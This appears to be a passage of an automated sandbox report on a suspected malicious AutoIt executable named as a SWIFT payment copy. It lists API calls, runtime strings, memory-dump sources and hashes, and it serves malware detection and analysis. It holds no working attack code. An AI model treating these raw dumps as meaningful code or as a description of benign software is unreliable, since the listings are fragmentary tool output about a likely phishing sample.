                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0093A9B6
                                                                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0093A9C6
                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0093A9F9
                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0093AA0D
                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 0093AA2B
                                                                                    • GetStockObject.GDI32(00000011), ref: 0093AA47
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0093AA52
                                                                                      • Part of subcall function 0093B63C: GetCursorPos.USER32(000000FF), ref: 0093B64F
                                                                                      • Part of subcall function 0093B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0093B66C
                                                                                      • Part of subcall function 0093B63C: GetAsyncKeyState.USER32(00000001), ref: 0093B691
                                                                                      • Part of subcall function 0093B63C: GetAsyncKeyState.USER32(00000002), ref: 0093B69F
                                                                                    • SetTimer.USER32(00000000,00000000,00000028,0093AB87), ref: 0093AA79
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                    • String ID: AutoIt v3 GUI
                                                                                    • API String ID: 1458621304-248962490
                                                                                    • Opcode ID: 2dc4ec613e444695f053fd5e56dc98ad4ed2985436264433059837c60028d1ea
                                                                                    • Instruction ID: 213e86630842a4cbac931dc29d287fc4a1cd1f6b89a8d5cff4f7424dc6e5c6de
                                                                                    • Opcode Fuzzy Hash: 2dc4ec613e444695f053fd5e56dc98ad4ed2985436264433059837c60028d1ea
                                                                                    • Instruction Fuzzy Hash: BDB17971A0520AAFDB14DFA8CC85BAE7BB8FF08714F114229FA56E7290DB349840DF51
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Foreground
                                                                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                    • API String ID: 62970417-1919597938
                                                                                    • Opcode ID: 658a2c1af259efe3be3208d5af1ac30348b113aaad3412e3f7be9ebc63b95acd
                                                                                    • Instruction ID: c3bb7e7aa2fb25ee972a80caccbcc028b69cfe7a9624e98e739812e58f2202f7
                                                                                    • Opcode Fuzzy Hash: 658a2c1af259efe3be3208d5af1ac30348b113aaad3412e3f7be9ebc63b95acd
                                                                                    • Instruction Fuzzy Hash: 50D1D730108742BBCF18EF24D481AAEBBB4BF94344F104A19F496675A1DB34E99ACFD1
                                                                                    APIs
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00983735
                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,009BDC00,00000000,?,00000000,?,?), ref: 009837A3
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009837EB
                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00983874
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00983B94
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00983BA1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                    • API String ID: 536824911-966354055
                                                                                    • Opcode ID: 6b52242e87c9d693fb56d1eab569420f908d7462b90091fbb841fcbbc03dce51
                                                                                    • Instruction ID: 4ea7480bf8b1b1c4d76b494bce7bf6a6894487baaa117e7a885661620a9678a3
                                                                                    • Opcode Fuzzy Hash: 6b52242e87c9d693fb56d1eab569420f908d7462b90091fbb841fcbbc03dce51
                                                                                    • Instruction Fuzzy Hash: F50249752046119FCB14EF24D895E2AB7E9FF89720F04895DF98A9B3A1CB34ED01CB85
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00986C56
                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00986D16
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                    • API String ID: 3974292440-719923060
                                                                                    • Opcode ID: ff5abc1429e67c348cca521e9c3f5cdcdd6f5d4f23990703da7faf9824deebbb
                                                                                    • Instruction ID: 2d7e5b74a922a0c13d22ce3a14cd29f8ccf8fc1fdd48944ad9271d3c17cc5886
                                                                                    • Opcode Fuzzy Hash: ff5abc1429e67c348cca521e9c3f5cdcdd6f5d4f23990703da7faf9824deebbb
                                                                                    • Instruction Fuzzy Hash: 8FA159302043419BCB14FF24D951B6AB3A5BF84314F14896DF9A6AB3D6DB34ED0ACB91
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0095CF91
                                                                                    • __swprintf.LIBCMT ref: 0095D032
                                                                                    • _wcscmp.LIBCMT ref: 0095D045
                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0095D09A
                                                                                    • _wcscmp.LIBCMT ref: 0095D0D6
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0095D10D
                                                                                    • GetDlgCtrlID.USER32(?), ref: 0095D15F
                                                                                    • GetWindowRect.USER32(?,?), ref: 0095D195
                                                                                    • GetParent.USER32(?), ref: 0095D1B3
                                                                                    • ScreenToClient.USER32(00000000), ref: 0095D1BA
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0095D234
                                                                                    • _wcscmp.LIBCMT ref: 0095D248
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0095D26E
                                                                                    • _wcscmp.LIBCMT ref: 0095D282
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                    • String ID: %s%u
                                                                                    • API String ID: 3119225716-679674701
                                                                                    • Opcode ID: 00f0345cba93144dc289929d88e6cb539735fab922dc18b9cd3c3bb91207b422
                                                                                    • Instruction ID: 9601c25efff83b1e075f188ad2ac48775d7be9d3d6181b0a6a403d0f9375703c
                                                                                    • Opcode Fuzzy Hash: 00f0345cba93144dc289929d88e6cb539735fab922dc18b9cd3c3bb91207b422
                                                                                    • Instruction Fuzzy Hash: FFA1D171209706AFD728DF65C884FAAB7ACFF44355F008519FDAAD2190DB30EA49CB91
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0095D8EB
                                                                                    • _wcscmp.LIBCMT ref: 0095D8FC
                                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0095D924
                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0095D941
                                                                                    • _wcscmp.LIBCMT ref: 0095D95F
                                                                                    • _wcsstr.LIBCMT ref: 0095D970
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0095D9A8
                                                                                    • _wcscmp.LIBCMT ref: 0095D9B8
                                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0095D9DF
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0095DA28
                                                                                    • _wcscmp.LIBCMT ref: 0095DA38
                                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0095DA60
                                                                                    • GetWindowRect.USER32(00000004,?), ref: 0095DAC9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                    • String ID: @$ThumbnailClass
                                                                                    • API String ID: 1788623398-1539354611
                                                                                    • Opcode ID: 39cf44c8a8c56bf54c44251e0ee7f83dbfba3daf9efdf32a3c3577c82af71081
                                                                                    • Instruction ID: 4c28c45c90ef69e4054276d1547bb4483fcfeefa644c3ec1c878895bd37fecc0
                                                                                    • Opcode Fuzzy Hash: 39cf44c8a8c56bf54c44251e0ee7f83dbfba3daf9efdf32a3c3577c82af71081
                                                                                    • Instruction Fuzzy Hash: A881D27100A3059BDB25DF11D881FAA7BECFF84315F04846AFD8A9A096DB30DD49CBA1
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                    • API String ID: 1038674560-1810252412
                                                                                    • Opcode ID: 3d06d2aac68671e892683190ed3cb9033add7802e0dcd9c3c9ee3443ecc5bda6
                                                                                    • Instruction ID: c525aa41851ccf15c94de3bdc6d08c708f11e3024161921f7df45927c6341293
                                                                                    • Opcode Fuzzy Hash: 3d06d2aac68671e892683190ed3cb9033add7802e0dcd9c3c9ee3443ecc5bda6
                                                                                    • Instruction Fuzzy Hash: 6F31DE31A84204EADB24EB61ED43FADB3789FA0305F20016AF941B21D5EBA5AE08C751
                                                                                    APIs
                                                                                    • LoadIconW.USER32(00000063), ref: 0095EAB0
                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0095EAC2
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0095EAD9
                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0095EAEE
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0095EAF4
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0095EB04
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0095EB0A
                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0095EB2B
                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0095EB45
                                                                                    • GetWindowRect.USER32(?,?), ref: 0095EB4E
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0095EBB9
                                                                                    • GetDesktopWindow.USER32 ref: 0095EBBF
                                                                                    • GetWindowRect.USER32(00000000), ref: 0095EBC6
                                                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0095EC12
                                                                                    • GetClientRect.USER32(?,?), ref: 0095EC1F
                                                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0095EC44
                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0095EC6F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                    • String ID:
                                                                                    • API String ID: 3869813825-0
                                                                                    • Opcode ID: d14533ecd5367493ca63a810c218e50bca1c8dd4f7619f0c54e1c703b7e614c2
                                                                                    • Instruction ID: 802a4553406f98da7b65ac43ba5f053c1d3e018188fcb5b17ca38d101b6aec91
                                                                                    • Opcode Fuzzy Hash: d14533ecd5367493ca63a810c218e50bca1c8dd4f7619f0c54e1c703b7e614c2
                                                                                    • Instruction Fuzzy Hash: 78515D71900709AFDB24DFA9CD89F6EBBF9FF04706F004928E587A25A0C775A948DB50
                                                                                    APIs
                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 009779C6
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 009779D1
                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 009779DC
                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 009779E7
                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 009779F2
                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 009779FD
                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00977A08
                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00977A13
                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00977A1E
                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00977A29
                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00977A34
                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00977A3F
                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00977A4A
                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00977A55
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00977A60
                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00977A6B
                                                                                    • GetCursorInfo.USER32(?), ref: 00977A7B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$Load$Info
                                                                                    • String ID:
                                                                                    • API String ID: 2577412497-0
                                                                                    • Opcode ID: 3c7eaa32f992d8d5e72369b402b6924049588662ffa8b2efcd8bbd867178629d
                                                                                    • Instruction ID: ac911d9bec1d49c0e52dc4d4e3545585d201ab310a84b9892f292815a60d5236
                                                                                    • Opcode Fuzzy Hash: 3c7eaa32f992d8d5e72369b402b6924049588662ffa8b2efcd8bbd867178629d
                                                                                    • Instruction Fuzzy Hash: B431D2B1D4831A6ADB509FB68C8999FFEECFF04750F50452AE54DE7280DA78A5008FA1
                                                                                    APIs
                                                                                      • Part of subcall function 0093E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0092C8B7,?,00002000,?,?,00000000,?,0092419E,?,?,?,009BDC00), ref: 0093E984
                                                                                      • Part of subcall function 0092660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009253B1,?,?,009261FF,?,00000000,00000001,00000000), ref: 0092662F
                                                                                    • __wsplitpath.LIBCMT ref: 0092C93E
                                                                                      • Part of subcall function 00941DFC: __wsplitpath_helper.LIBCMT ref: 00941E3C
                                                                                    • _wcscpy.LIBCMT ref: 0092C953
                                                                                    • _wcscat.LIBCMT ref: 0092C968
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0092C978
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0092CABE
                                                                                      • Part of subcall function 0092B337: _wcscpy.LIBCMT ref: 0092B36F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                    • API String ID: 2258743419-1018226102
                                                                                    • Opcode ID: 28fcdc0208849541c548aead50f2987dadbf2e8538ec68d31c6c5593507ad6ac
                                                                                    • Instruction ID: 3baca65f78783e929f4d6fedf219ea249a0a0e250a69857f947df17c71298244
                                                                                    • Opcode Fuzzy Hash: 28fcdc0208849541c548aead50f2987dadbf2e8538ec68d31c6c5593507ad6ac
                                                                                    • Instruction Fuzzy Hash: 0712AF715083419FCB24EF24D891AAFBBE9BFD9304F40491EF58A93261DB30DA49CB52
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0098CEFB
                                                                                    • DestroyWindow.USER32(?,?), ref: 0098CF73
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0098CFF4
                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0098D016
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0098D025
                                                                                    • DestroyWindow.USER32(?), ref: 0098D042
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00920000,00000000), ref: 0098D075
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0098D094
                                                                                    • GetDesktopWindow.USER32 ref: 0098D0A9
                                                                                    • GetWindowRect.USER32(00000000), ref: 0098D0B0
                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0098D0C2
                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0098D0DA
                                                                                      • Part of subcall function 0093B526: GetWindowLongW.USER32(?,000000EB), ref: 0093B537
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                    • String ID: 0$tooltips_class32
                                                                                    • API String ID: 3877571568-3619404913
                                                                                    • Opcode ID: 4ff99bf2aab2421d7d5bc2b5679db0e2eec945ac19fd5b225ddb87553848cf14
                                                                                    • Instruction ID: 232782ace80b085a3ffd0e29e93f5d01641b4024aee7171a757cbd7c8e635dda
                                                                                    • Opcode Fuzzy Hash: 4ff99bf2aab2421d7d5bc2b5679db0e2eec945ac19fd5b225ddb87553848cf14
                                                                                    • Instruction Fuzzy Hash: CD71CBB0154345AFEB24DF28CC84FA63BE9EB89708F44451DF9858B3A1D730E842DB62
                                                                                    APIs
                                                                                      • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0098F37A
                                                                                      • Part of subcall function 0098D7DE: ClientToScreen.USER32(?,?), ref: 0098D807
                                                                                      • Part of subcall function 0098D7DE: GetWindowRect.USER32(?,?), ref: 0098D87D
                                                                                      • Part of subcall function 0098D7DE: PtInRect.USER32(?,?,0098ED5A), ref: 0098D88D
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0098F3E3
                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0098F3EE
                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0098F411
                                                                                    • _wcscat.LIBCMT ref: 0098F441
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0098F458
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0098F471
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0098F488
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0098F4AA
                                                                                    • DragFinish.SHELL32(?), ref: 0098F4B1
                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0098F59C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                    • API String ID: 169749273-3440237614
                                                                                    • Opcode ID: 23b66ab14463beb881afb5a5a47c0083f1fdf1a4a02dce133ed51558845b1b70
                                                                                    • Instruction ID: 5683d8b2a5955bf59b216ded382f06893aeac03f8338857fb39fb974f399fce5
                                                                                    • Opcode Fuzzy Hash: 23b66ab14463beb881afb5a5a47c0083f1fdf1a4a02dce133ed51558845b1b70
                                                                                    • Instruction Fuzzy Hash: 95613871109300AFC711EF64DC85EAFBBE8EFD9714F004A1EF595962A1DB709A09CB92
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0096AB3D
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0096AB46
                                                                                    • VariantClear.OLEAUT32(?), ref: 0096AB52
                                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0096AC40
                                                                                    • __swprintf.LIBCMT ref: 0096AC70
                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 0096AC9C
                                                                                    • VariantInit.OLEAUT32(?), ref: 0096AD4D
                                                                                    • SysFreeString.OLEAUT32(00000016), ref: 0096ADDF
                                                                                    • VariantClear.OLEAUT32(?), ref: 0096AE35
                                                                                    • VariantClear.OLEAUT32(?), ref: 0096AE44
                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0096AE80
